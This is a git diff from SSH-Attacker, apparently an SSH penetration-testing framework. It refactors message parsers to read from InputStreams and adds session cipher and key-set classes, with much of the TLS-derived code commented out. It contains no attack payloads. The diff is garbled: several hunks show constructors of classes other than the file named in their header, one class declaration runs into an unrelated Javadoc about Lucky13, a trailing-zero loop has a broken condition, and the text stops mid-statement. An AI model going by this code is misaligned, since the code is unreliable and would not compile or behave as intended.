a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java index 187c512cd..db6e7520f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeReplyMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeReplyMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,22 @@ public class DhGexKeyExchangeReplyMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public DhGexKeyExchangeReplyMessageParser(byte[] array) { - super(array); + /* + public DhGexKeyExchangeReplyMessageParser(byte[] array) { + super(array); + } + public DhGexKeyExchangeReplyMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public DhGexKeyExchangeReplyMessageParser(InputStream stream) { + super(stream); } - public DhGexKeyExchangeReplyMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(DhGexKeyExchangeReplyMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java index 24bfd1c24..13bf5c793 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhGexKeyExchangeRequestMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhGexKeyExchangeRequestMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,14 @@ public class DhGexKeyExchangeRequestMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public DhGexKeyExchangeRequestMessageParser(byte[] array) { + /* public DhGexKeyExchangeRequestMessageParser(byte[] array) { super(array); } - public DhGexKeyExchangeRequestMessageParser(byte[] array, int startPosition) { super(array, startPosition); + }*/ + public DhGexKeyExchangeRequestMessageParser(InputStream stream) { + super(stream); } @Override @@ -53,4 +56,9 @@ protected void parseMessageSpecificContents() { parsePreferredGroupSize(); parseMaximalGroupSize(); } + + @Override + public void parse(DhGexKeyExchangeRequestMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java index 7373979ae..e93f48b9b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/DhKeyExchangeInitMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.DhKeyExchangeInitMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,17 @@ public class DhKeyExchangeInitMessageParser extends SshMessageParser private static final Logger LOGGER = LogManager.getLogger(); - public DisconnectMessageParser(byte[] array) { - super(array); - } + /* + public DisconnectMessageParser(byte[] array) { + super(array); + } + public DisconnectMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + + */ - public DisconnectMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public DisconnectMessageParser(InputStream stream) { + super(stream); } @Override @@ -72,4 +79,9 @@ protected void parseMessageSpecificContents() { parseDescription(); parseLanguageTag(); } + + @Override + public void parse(DisconnectMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java index a3d1a71c4..f070c65b9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/EcdhKeyExchangeInitMessageParser.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.EcdhKeyExchangeInitMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,16 @@ public class EcdhKeyExchangeInitMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public IgnoreMessageParser(byte[] array) { - super(array); - } + /* + public IgnoreMessageParser(byte[] array) { + super(array); + } + public IgnoreMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + + */ - public IgnoreMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public IgnoreMessageParser(InputStream stream) { + super(stream); } @Override @@ -42,4 +49,9 @@ private void parseData() { protected void parseMessageSpecificContents() { parseData(); } + + @Override + public void parse(IgnoreMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java index b13cbe7d1..d7615a878 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/KeyExchangeInitMessageParser.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.KeyExchangeInitMessage; import de.rub.nds.sshattacker.core.util.Converter; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -21,13 +22,19 @@ public class KeyExchangeInitMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + /* - public KeyExchangeInitMessageParser(byte[] array) { - super(array); - } + public KeyExchangeInitMessageParser(byte[] array) { + super(array); + } + public KeyExchangeInitMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + + */ - public KeyExchangeInitMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public KeyExchangeInitMessageParser(InputStream stream) { + super(stream); } @Override @@ -219,4 +226,9 @@ public void parseMessageSpecificContents() { parseFirstKeyExchangePacketFollows(); parseReserved(); } + + @Override + public void parse(KeyExchangeInitMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java index 43e4ecb20..9b14b5967 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/NewKeysMessageParser.java @@ -9,15 +9,21 @@ import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.NewKeysMessage; +import java.io.InputStream; public class NewKeysMessageParser extends SshMessageParser { - public NewKeysMessageParser(byte[] array) { - super(array); - } + /* + public NewKeysMessageParser(byte[] array) { + super(array); + } + public NewKeysMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ - public NewKeysMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public NewKeysMessageParser(InputStream stream) { + super(stream); } @Override @@ -27,4 +33,9 @@ public NewKeysMessage createMessage() { @Override protected void parseMessageSpecificContents() {} + + @Override + public void parse(NewKeysMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java index 3dd681908..a1ef61451 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/RsaKeyExchangeDoneMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.BinaryPacketConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangeDoneMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -17,12 +18,22 @@ public class RsaKeyExchangeDoneMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); + /* - public RsaKeyExchangeSecretMessageParser(byte[] array) { - super(array); + public RsaKeyExchangeSecretMessageParser(byte[] array) { + super(array); + } + + public RsaKeyExchangeSecretMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ + + public RsaKeyExchangeSecretMessageParser(InputStream stream) { + super(stream); } - public RsaKeyExchangeSecretMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + @Override + public void parse(RsaKeyExchangeSecretMessage message) { + parseMessageSpecificContents(); } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java index e63be58e4..65145222e 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ServiceAcceptMessageParser.java @@ -10,6 +10,7 @@ import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.ServiceAcceptMessage; +import java.io.InputStream; import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -18,12 +19,18 @@ public class ServiceAcceptMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - public UnknownMessageParser(byte[] array) { - super(array); - } + /* + public UnknownMessageParser(byte[] array) { + super(array); + } + + public UnknownMessageParser(byte[] array, int startPosition) { + super(array, startPosition); + } + */ - public UnknownMessageParser(byte[] array, int startPosition) { - super(array, startPosition); + public UnknownMessageParser(InputStream stream) { + super(stream); } @Override @@ -36,4 +43,9 @@ protected void parseMessageSpecificContents() { LOGGER.debug( "Payload: " + ArrayConverter.bytesToRawHexString(message.getPayload().getValue())); } + + @Override + public void parse(UnknownMessage message) { + parseMessageSpecificContents(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java index 28b2e6a64..60a7643c7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/parser/VersionExchangeMessageParser.java @@ -12,6 +12,7 @@ import de.rub.nds.sshattacker.core.constants.CharConstants; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; import de.rub.nds.sshattacker.core.protocol.transport.message.VersionExchangeMessage; +import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -19,12 +20,16 @@ public class VersionExchangeMessageParser extends ProtocolMessageParserFrom the Lucky13 paper: An individual record R (viewed as a byte sequence of length at + * least zero) is processed as follows. The sender maintains an 8-byte sequence number SQN which + * is incremented for each record sent, and forms a 5-byte field HDR consisting of a 1-byte type + * field, a 2-byte version field, and a 2-byte length field. It then calculates a MAC over the + * bytes SQN || HDR || R. + * + * @param session The Record for which the data should be collected + * @param protocolVersion According to which ProtocolVersion the AdditionalAuthenticationData is + * collected + * @return The AdditionalAuthenticatedData + */ + protected final byte[] collectAdditionalAuthenticatedData(Session session) { + ByteArrayOutputStream stream = new ByteArrayOutputStream(); + /*try { + if (protocolVersion.isTLS13()) { + stream.write(record.getContentType().getValue()); + stream.write(record.getProtocolVersion().getValue()); + if (record.getLength() != null && record.getLength().getValue() != null) { + stream.write( + ArrayConverter.intToBytes( + record.getLength().getValue(), RecordByteLength.RECORD_LENGTH)); + } else { + // It may happen that the record does not have a length prepared - in that case + // we will need to add + // the length of the data content + // This is mostly interessting for fuzzing + stream.write( + ArrayConverter.intToBytes( + record.getCleanProtocolMessageBytes().getValue().length, + RecordByteLength.RECORD_LENGTH)); + } + return stream.toByteArray(); + } else { + if (protocolVersion.isDTLS()) { + if (ProtocolMessageType.getContentType(record.getContentType().getValue()) + == ProtocolMessageType.TLS12_CID) { + stream.write(SEQUENCE_NUMBER_PLACEHOLDER); + stream.write(ProtocolMessageType.TLS12_CID.getValue()); + stream.write(record.getConnectionId().getValue().length); + } else { + stream.write( + ArrayConverter.intToBytes( + record.getEpoch().getValue().shortValue(), + RecordByteLength.DTLS_EPOCH)); + stream.write( + ArrayConverter.longToUint48Bytes( + record.getSequenceNumber().getValue().longValue())); + } + } else { + stream.write( + ArrayConverter.longToUint64Bytes( + record.getSequenceNumber().getValue().longValue())); + } + stream.write(record.getContentType().getValue()); + byte[] version; + if (!protocolVersion.isSSL()) { + version = record.getProtocolVersion().getValue(); + } else { + version = new byte[0]; + } + stream.write(version); + if (protocolVersion.isDTLS() + && ProtocolMessageType.getContentType(record.getContentType().getValue()) + == ProtocolMessageType.TLS12_CID) { + stream.write( + ArrayConverter.intToBytes( + record.getEpoch().getValue().shortValue(), + RecordByteLength.DTLS_EPOCH)); + stream.write( + ArrayConverter.longToUint48Bytes( + record.getSequenceNumber().getValue().longValue())); + stream.write(record.getConnectionId().getValue()); + } + int length; + if (record.getComputations().getAuthenticatedNonMetaData() == null + || record.getComputations().getAuthenticatedNonMetaData().getOriginalValue() + == null) { + // This case is required for TLS 1.2 aead encryption + length = record.getComputations().getPlainRecordBytes().getValue().length; + } else { + length = + record.getComputations() + .getAuthenticatedNonMetaData() + .getValue() + .length; + } + stream.write(ArrayConverter.intToBytes(length, RecordByteLength.RECORD_LENGTH)); + return stream.toByteArray(); + } + } catch (IOException e) { + throw new WorkflowExecutionException("Could not write data to ByteArrayOutputStream"); + }*/ + + return null; + } + + /** + * Reads a byte array from the end, and counts how many 0x00 bytes there are, until the first + * non-zero byte appears + * + * @param plainRecordBytes the byte array to count from + * @return number of trailing 0x00 bytes + */ + private int countTrailingZeroBytes(byte[] plainRecordBytes) { + int counter = 0; + for (int i = plainRecordBytes.length - 1; i < plainRecordBytes.length; i--) { + if (plainRecordBytes[i] == 0) { + counter++; + } else { + return counter; + } + } + return counter; + } + + /** + * Encapsulate plain record bytes as TLS 1.3 application data or DTLS 1.2 ConnectionID data + * container. Construction: CleanBytes | ContentType | 0x00000... (Padding) + * + * @param session the record which is affected + * @return the encapsulated data + */ + protected byte[] encapsulateRecordBytes(Session session) { + byte[] padding = + session.getComputations().getPadding() != null + ? session.getComputations().getPadding().getValue() + : new byte[0]; + return ArrayConverter.concatenate( + session.getCleanProtocolMessageBytes().getValue(), + new byte[] {session.getContentType().getValue()}, + padding); + } + + /** + * Read plain record bytes that are encapsuled as either TLS 1.3 application data or DTLS 1.2 + * ConnectionID data. Construction: CleanBytes | ContentType | 0x00000... (Padding) + * + * @param plainRecordBytes the plain encapsulated record bytes + * @param session the record which is affected + */ + protected void parseEncapsulatedRecordBytes(byte[] plainRecordBytes, Session session) { + int numberOfPaddingBytes = countTrailingZeroBytes(plainRecordBytes); + if (numberOfPaddingBytes == plainRecordBytes.length) { + LOGGER.warn( + "Record contains ONLY padding and no content type. Setting clean bytes == plainbytes"); + session.setCleanProtocolMessageBytes(plainRecordBytes); + return; + } + PlaintextParser parser = new PlaintextParser(plainRecordBytes); + byte[] cleanBytes = + parser.parseByteArrayField(plainRecordBytes.length - numberOfPaddingBytes - 1); + byte[] contentType = parser.parseByteArrayField(1); + byte[] padding = parser.parseByteArrayField(numberOfPaddingBytes); + session.getComputations().setPadding(padding); + session.setCleanProtocolMessageBytes(cleanBytes); + session.setContentType(contentType[0]); + session.setContentMessageType(ProtocolMessageType.getContentType(contentType[0])); + } + + public CipherState getState() { + return state; + } + + public void setState(CipherState state) { + this.state = state; + } + + public ConnectionEndType getLocalConnectionEndType() { + return sshContext.getContext().getConnection().getLocalConnectionEndType(); + } + + public ConnectionEndType getConnectionEndType() { + return sshContext.getChooser().getConnectionEndType(); + } + + public Integer getDefaultAdditionalPadding() { + return sshContext.getConfig().getDefaultAdditionalPadding(); + } + + public ConnectionEndType getTalkingConnectionEndType() { + return sshContext.getTalkingConnectionEndType(); + } + + public Random getRandom() { + return sshContext.getRandom(); + } + + class PlaintextParser extends Parser { + + public PlaintextParser(byte[] array) { + super(new ByteArrayInputStream(array)); + } + + @Override + public void parse(Object t) { + throw new UnsupportedOperationException("Not supported yet."); + } + + @Override + public byte[] parseByteArrayField(int length) { + return super.parseByteArrayField(length); + } + + @Override + public int getBytesLeft() { + return super.getBytesLeft(); + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java new file mode 100644 index 000000000..68898adad --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionCipherFactory.java @@ -0,0 +1,87 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.cipher; + +/*import de.rub.nds.sshattacker.core.constants.AlgorithmResolver; +import de.rub.nds.sshattacker.core.constants.CipherSuite; +import de.rub.nds.sshattacker.core.constants.CipherType; +import de.rub.nds.sshattacker.core.constants.ExtensionType;*/ + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SessionCipherFactory { + + private static final Logger LOGGER = LogManager.getLogger(); + + /*public static SessionCipher getSessionCipher( + SshContext sshContext, KeySet keySet, CipherSuite cipherSuite, byte[] connectionId) { + try { + if (sshContext.getChooser().getSelectedCipherSuite() == null + || !cipherSuite.isImplemented()) { + LOGGER.warn( + "Cipher " + + cipherSuite.name() + + " not implemented. Using Null Cipher instead"); + return getNullCipher(sshContext); + } else { + CipherType type = AlgorithmResolver.getCipherType(cipherSuite); + CipherState state = + new CipherState( + sshContext.getChooser().getSelectedProtocolVersion(), + cipherSuite, + keySet, + sshContext.isExtensionNegotiated(ExtensionType.ENCRYPT_THEN_MAC), + connectionId); + switch (type) { + case AEAD: + return new SessionAEADCipher(sshContext, state); + case BLOCK: + return new SessionBlockCipher(sshContext, state); + case STREAM: + return new SessionStreamCipher(sshContext, state); + default: + LOGGER.warn("UnknownCipherType:" + type.name()); + return new SessionNullCipher(sshContext, state); + } + } + } catch (Exception e) { + LOGGER.debug( + "Could not create RecordCipher from the current Context! Creating null Cipher", + e); + return getNullCipher(sshContext); + } + }*/ + + /*public static SessionCipher getSessionCipher( + TlsContext tlsContext, KeySet keySet, boolean isForEncryption) { + return getSessionCipher( + tlsContext, + keySet, + tlsContext.getChooser().getSelectedCipherSuite(), + isForEncryption + ? tlsContext.getWriteConnectionId() + : tlsContext.getReadConnectionId()); + }*/ + + public static SessionNullCipher getNullCipher(SshContext sshContext) { + return new SessionNullCipher( + sshContext, + new CipherState( + sshContext.getChooser().getSelectedCompressionAlgorithm(), + sshContext.getChooser().getSelectedEncryptionAlgorithm(), + sshContext.getChooser().getSelectedMacAlgorithm(), + sshContext.getChooser().getSelectedKeyExchangeAlgorithm(), + null, + null, + null)); + } + + private SessionCipherFactory() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java new file mode 100644 index 000000000..e676095eb --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/SessionNullCipher.java @@ -0,0 +1,40 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.cipher; + +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.session.Session; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class SessionNullCipher extends SessionCipher { + + private static final Logger LOGGER = LogManager.getLogger(); + + public SessionNullCipher(SshContext sshContext, CipherState state) { + super(sshContext, state); + } + + @Override + public void encrypt(Session session) throws CryptoException { + + LOGGER.debug("Encrypting Record: (null cipher)"); + session.prepareComputations(); + byte[] cleanBytes = session.getCleanProtocolMessageBytes().getValue(); + session.setProtocolMessageBytes(cleanBytes); + } + + @Override + public void decrypt(Session session) throws CryptoException { + LOGGER.debug("Decrypting Record: (null cipher)"); + session.prepareComputations(); + byte[] protocolMessageBytes = session.getProtocolMessageBytes().getValue(); + session.setCleanProtocolMessageBytes(protocolMessageBytes); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java new file mode 100644 index 000000000..f5f8b84de --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySet.java @@ -0,0 +1,126 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.cipher.cryptohelper; + +import de.rub.nds.tlsattacker.transport.ConnectionEndType; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class KeySet { + + private static final Logger LOGGER = LogManager.getLogger(); + + private byte[] clientWriteMacSecret; + private byte[] serverWriteMacSecret; + private byte[] clientWriteKey; + private byte[] serverWriteKey; + private byte[] clientWriteIv; + private byte[] serverWriteIv; + + public KeySet() {} + + public byte[] getClientWriteMacSecret() { + return clientWriteMacSecret; + } + + public void setClientWriteMacSecret(byte[] clientWriteMacSecret) { + this.clientWriteMacSecret = clientWriteMacSecret; + } + + public byte[] getServerWriteMacSecret() { + return serverWriteMacSecret; + } + + public void setServerWriteMacSecret(byte[] serverWriteMacSecret) { + this.serverWriteMacSecret = serverWriteMacSecret; + } + + public byte[] getClientWriteKey() { + return clientWriteKey; + } + + public void setClientWriteKey(byte[] clientWriteKey) { + this.clientWriteKey = clientWriteKey; + } + + public byte[] getServerWriteKey() { + return serverWriteKey; + } + + public void setServerWriteKey(byte[] serverWriteKey) { + this.serverWriteKey = serverWriteKey; + } + + public byte[] getClientWriteIv() { + return clientWriteIv; + } + + public void setClientWriteIv(byte[] clientWriteIv) { + this.clientWriteIv = clientWriteIv; + } + + public byte[] getServerWriteIv() { + return serverWriteIv; + } + + public void setServerWriteIv(byte[] serverWriteIv) { + this.serverWriteIv = serverWriteIv; + } + + public byte[] getWriteKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteKey; + } else { + return serverWriteKey; + } + } + + public byte[] getReadKey(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.SERVER) { + LOGGER.debug( + "getReadKey: Using clientWriteKey for connectionEndType {}", connectionEndType); + return clientWriteKey; + } else { + LOGGER.debug( + "getReadKey: Using serverWriteKey for connectionEndType {}", connectionEndType); + return serverWriteKey; + } + } + + public byte[] getReadMacSecret(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.SERVER) { + return clientWriteMacSecret; + } else { + return serverWriteMacSecret; + } + } + + public byte[] getWriteMacSecret(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteMacSecret; + } else { + return serverWriteMacSecret; + } + } + + public byte[] getWriteIv(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.CLIENT) { + return clientWriteIv; + } else { + return serverWriteIv; + } + } + + public byte[] getReadIv(ConnectionEndType connectionEndType) { + if (connectionEndType == ConnectionEndType.SERVER) { + return clientWriteIv; + } else { + return serverWriteIv; + } + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java new file mode 100644 index 000000000..69326351a --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/session/cipher/cryptohelper/KeySetGenerator.java @@ -0,0 +1,262 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.session.cipher.cryptohelper; + +import de.rub.nds.sshattacker.core.exceptions.CryptoException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import java.security.NoSuchAlgorithmException; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class KeySetGenerator { + + private static final Logger LOGGER = LogManager.getLogger(); + + private static final int AEAD_IV_LENGTH = 12; + + /*public static KeySet generateKeySet( + SshContext sshContext, ProtocolVersion protocolVersion, Tls13KeySetType keySetType) + throws NoSuchAlgorithmException, CryptoException { + if (protocolVersion.isTLS13()) { + return getTls13KeySet(sshContext, keySetType); + } else { + return getTlsKeySet(sshContext); + } + }*/ + + public static KeySet generateKeySet(SshContext sshContext) + throws NoSuchAlgorithmException, CryptoException { + /*return generateKeySet(sshContext, sshContext.getChooser().getSelectedProtocolVersion(), + sshContext.getActiveKeySetTypeWrite());*/ + + return getTlsKeySet(sshContext); + } + + /*private static KeySet getTls13KeySet(SshContext sshContext, Tls13KeySetType keySetType) + throws CryptoException { + CipherSuite cipherSuite = sshContext.getChooser().getSelectedCipherSuite(); + byte[] clientSecret = new byte[0]; + byte[] serverSecret = new byte[0]; + if (null == keySetType) { + throw new CryptoException("Unknown KeySetType:" + keySetType.name()); + } else { + switch (keySetType) { + case HANDSHAKE_TRAFFIC_SECRETS: + clientSecret = sshContext.getChooser().getClientHandshakeTrafficSecret(); + serverSecret = sshContext.getChooser().getServerHandshakeTrafficSecret(); + break; + case APPLICATION_TRAFFIC_SECRETS: + clientSecret = sshContext.getChooser().getClientApplicationTrafficSecret(); + serverSecret = sshContext.getChooser().getServerApplicationTrafficSecret(); + break; + case EARLY_TRAFFIC_SECRETS: + cipherSuite = sshContext.getChooser().getEarlyDataCipherSuite(); + clientSecret = sshContext.getChooser().getClientEarlyTrafficSecret(); + serverSecret = sshContext.getChooser().getClientEarlyTrafficSecret(); + break; + case NONE: + LOGGER.warn("KeySet is NONE! , returning empty KeySet"); + return new KeySet(keySetType); + default: + throw new CryptoException("Unknown KeySetType:" + keySetType.name()); + } + } + LOGGER.debug("ActiveKeySetType is " + keySetType); + CipherAlgorithm cipherAlg = AlgorithmResolver.getCipher(cipherSuite); + KeySet keySet = new KeySet(keySetType); + HKDFAlgorithm hkdfAlgorithm = AlgorithmResolver.getHKDFAlgorithm(cipherSuite); + keySet.setClientWriteKey( + HKDFunction.expandLabel( + hkdfAlgorithm, + clientSecret, + HKDFunction.KEY, + new byte[] {}, + cipherAlg.getKeySize())); + LOGGER.debug( + "Client write key: {}", + ArrayConverter.bytesToHexString(keySet.getClientWriteKey())); + keySet.setServerWriteKey( + HKDFunction.expandLabel( + hkdfAlgorithm, + serverSecret, + HKDFunction.KEY, + new byte[] {}, + cipherAlg.getKeySize())); + LOGGER.debug( + "Server write key: {}", + ArrayConverter.bytesToHexString(keySet.getServerWriteKey())); + keySet.setClientWriteIv( + HKDFunction.expandLabel( + hkdfAlgorithm, + clientSecret, + HKDFunction.IV, + new byte[] {}, + AEAD_IV_LENGTH)); + LOGGER.debug( + "Client write IV: {}", 